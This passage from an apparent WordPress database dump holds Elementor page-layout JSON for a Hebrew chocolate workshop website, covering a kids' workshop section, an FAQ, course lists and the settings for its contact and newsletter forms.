\\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62e2de7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/kids-choclate.jpg\",\"id\":125},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b4fe8e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05d4\\u05d5\\u05d0 \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8? \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d5\\u05d9\\u05e6\\u05e8\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e2\\u05d1\\u05d5\\u05e8\\u05dd \\u05dc\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd? \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd? \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1? \\u05e8\\u05e7 \\u05ea\\u05d2\\u05d9\\u05d3\\u05d5 \\u05d5\\u05d4\\u05dd \\u05d9\\u05e7\\u05d1\\u05dc\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05dc\\u05d0\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d4\\u05d9\\u05d9\\u05ea\\u05d4 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d9 \\u05e4\\u05e2\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05d4\\u05dd \\u05d4\\u05e7\\u05d8\\u05e0\\u05d9\\u05dd \\u05dc\\u05d3\\u05d1\\u05e8 \\u05e9\\u05d4\\u05dd \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd - \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3!<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40986278\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"69a8df27\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6999b663\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3ea5b73c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"17ab813e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"37c615a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7559efb1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d2\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea (\\u05d1\\u05d8\\u05d7 \\u05ea\\u05e8\\u05e6\\u05d5 \\u05e1\\u05d1\\u05d9\\u05d1\\u05d4 \\u05d8\\u05d1\\u05e2\\u05d9\\u05ea)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e2\\u05d3 \\u05db4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd \\u05d5\\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8\\u05d9\\u05dd \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d4\\u05dd \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d9\\u05d0\\u05db\\u05dc\\u05d5, \\u05d4\\u05dd \\u05d2\\u05dd \\u05d9\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05de\\u05d7\\u05e8 \\u05de\\u05d4 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d9\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3, \\u05d6\\u05d4 \\u05d1\\u05e1\\u05d3\\u05e8 \\u05d2\\u05de\\u05d5\\u05e8, \\u05db\\u05de\\u05d4 \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5 - \\u05d9\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"694d95f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e053522\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c10ea65\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7602a7a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7297bf5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4541ce0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"7952f0ec\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4df9243\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"2024cfba\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"34b4157f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"42863b35\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"3bedbf86\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7ee51c99\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"414e8603\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6cd310bc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(567,129,'_elementor_version','0.4'),(570,130,'_wp_page_template','elementor_canvas'),(571,130,'_elementor_edit_mode','builder'),(572,130,'_elementor_data','[{\"id\":\"73f3a63e\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"63f1f80\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5713db43\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"57068ba8\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"596a5a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"26fa35fd\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4097a5fb\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"144a579e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd8148d\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans 